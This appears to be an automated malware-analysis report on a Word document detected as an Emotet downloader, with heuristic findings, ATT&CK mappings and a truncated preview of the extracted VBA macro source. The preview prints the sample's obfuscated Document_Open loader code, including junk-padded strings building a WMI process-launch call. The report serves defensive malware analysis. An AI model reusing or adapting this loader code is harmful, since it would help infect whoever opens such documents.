MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of Emotet malware. The critical heuristic 'OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER' specifically points to this technique. ClamAV detection further confirms the malicious nature and identifies it as a downloader variant of Emotet. The VBA code is heavily obfuscated but the presence of auto-execution and CreateObject calls suggests it attempts to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-9494555-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-9494555-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14501 bytes |
SHA-256: 09079bcd4e91520ea974c5533891d9ee230b7effa6ffd87a5a84041f51cf65d6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "A3bld1desm31pv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Uksholrwcijg5e.Irdnasz1p2d
End Sub
Attribute VB_Name = "Uksholrwcijg5e"
Attribute VB_Base = "0{FE1B6874-EB31-45AB-9472-426B7FBC0AE8}{A903F979-A7F5-44AC-AB16-D929418204F7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Irdnasz1p2d()
On Error Resume Next
vpwX8wxw5 = (9035 + 140 * (875 - Log(sQIkI55u7 + CBool(946) / 413 - CBool(bNpIN2n * ChrB(AjZyv))) - 2 / Log(Tvas07 * Hex(486) - OOdSZ4jE2 + jKY)))
ZHWE2fRJt = loE / 9 - OFlW0a2K - CSng(3032) / (Zzl * Sgn(9307 / CBool(11867829)) - 2 - CInt(1 / 9321))
ocj = 7947 - Atn(495) - 4305 - ogasZCD * (46307565 / Fix(PCYGK) / 1 * Oct(9209))
ucaC1C1 = 6487 - CSng(59 - iWg - 720 + Sqr(WDUKs795)) - dzsEl01 + Oct(5163) * RGtA / CStr(115 / CInt(taQA9) * AyAzE977 - jeyLO)
Kxd4dt82huy9x = 100
On Error Resume Next
vpwX8wxw5 = (9035 + 140 * (875 - Log(sQIkI55u7 + CBool(946) / 413 - CBool(bNpIN2n * ChrB(AjZyv))) - 2 / Log(Tvas07 * Hex(486) - OOdSZ4jE2 + jKY)))
ZHWE2fRJt = loE / 9 - OFlW0a2K - CSng(3032) / (Zzl * Sgn(9307 / CBool(11867829)) - 2 - CInt(1 / 9321))
ocj = 7947 - Atn(495) - 4305 - ogasZCD * (46307565 / Fix(PCYGK) / 1 * Oct(9209))
ucaC1C1 = 6487 - CSng(59 - iWg - 720 + Sqr(WDUKs795)) - dzsEl01 + Oct(5163) * RGtA / CStr(115 / CInt(taQA9) * AyAzE977 - jeyLO)
Hfr7t3rt5c2r = ChrW(Kxd4dt82huy9x + (15))
On Error Resume Next
vpwX8wxw5 = (9035 + 140 * (875 - Log(sQIkI55u7 + CBool(946) / 413 - CBool(bNpIN2n * ChrB(AjZyv))) - 2 / Log(Tvas07 * Hex(486) - OOdSZ4jE2 + jKY)))
ZHWE2fRJt = loE / 9 - OFlW0a2K - CSng(3032) / (Zzl * Sgn(9307 / CBool(11867829)) - 2 - CInt(1 / 9321))
ocj = 7947 - Atn(495) - 4305 - ogasZCD * (46307565 / Fix(PCYGK) / 1 * Oct(9209))
ucaC1C1 = 6487 - CSng(59 - iWg - 720 + Sqr(WDUKs795)) - dzsEl01 + Oct(5163) * RGtA / CStr(115 / CInt(taQA9) * AyAzE977 - jeyLO)
P2ioutej_6vs9 = "23&bh s6[[hu12 712tdd]]s hj[23&bh s6[[hu12 712tdd]]s hj[w23&bh s6[[hu12 712tdd]]s hj[i23&bh s6[[hu12 712tdd]]s hj[nm23&bh s6[[hu12 712tdd]]s hj[23&bh s6[[hu12 712tdd]]s hj[gm23&bh s6[[hu12 712tdd]]s hj[t23&bh s6[[hu12 712tdd]]s hj[23&bh s6[[hu12 712tdd]]s hj[" + Hfr7t3rt5c2r + "23&bh s6[[hu12 712tdd]]s hj[23&bh s6[[hu12 712tdd]]s hj[:23&bh s6[[hu12 712tdd]]s hj[w23&bh s6[[hu12 712tdd]]s hj[in23&bh s6[[hu12 712tdd]]s hj[23&bh s6[[hu12 712tdd]]s hj[323&bh s6[[hu12 712tdd]]s hj[223&bh s6[[hu12 712tdd]]s hj[_23&bh s6[[hu12 712tdd]]s hj[" + Uksholrwcijg5e.Sz_4e96062akcegx + "23&bh s6[[hu12 712tdd]]s hj[ro23&bh s6[[hu12 712tdd]]s hj[23&bh s6[[hu12 712tdd]]s hj[ce23&bh s6[[hu12 712tdd]]s hj[s23&bh s6[[hu12 712tdd]]s hj[s23&bh s6[[hu12 712tdd]]s hj["
On Error Resume Next
vpwX8wxw5 = (9035 + 140 * (875 - Log(sQIkI55u7 + CBool(946) / 413 - CBool(bNpIN2n * ChrB(AjZyv))) - 2 / Log(Tvas07 * Hex(486) - OOdSZ4jE2 + jKY)))
ZHWE2fRJt = loE / 9 - OFlW0a2K - CSng(3032) / (Zzl * Sgn(9307 / CBool(11867829)) - 2 - CInt(1 / 9321))
ocj = 7947 - Atn(495) - 4305 - ogasZCD * (46307565 / Fix(PCYGK) / 1 * Oct(9209))
ucaC1C1 = 6487 - CSng(59 - iWg - 720 + Sqr(WDUKs795)) - dzsEl01 + Oct(5163) * RGtA / CStr(115 / CInt(taQA9) * AyAzE977 - jeyLO)
Jjpjcs4eack = Izs50g_t_7wi(P2ioutej_6vs9)
On Error Resume Next
vpwX8wxw5 = (9035 + 140 * (875 - Log(sQIkI55u7 + CBool(946) / 413 - CBool(bNpIN2n * ChrB(AjZyv))) - 2 / Log(Tvas07 * Hex(486) - OOdSZ4jE2 + jKY)))
ZHWE2fRJt = loE / 9 - OFlW0a2K - CSng(3032) / (Zzl * Sgn(9307 / CBool(11867829)) - 2 - CInt(1 / 9321))
ocj = 7947 - Atn(495) - 4305 - ogasZCD * (46307565 / Fix(PCYGK) / 1 * Oct(920
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.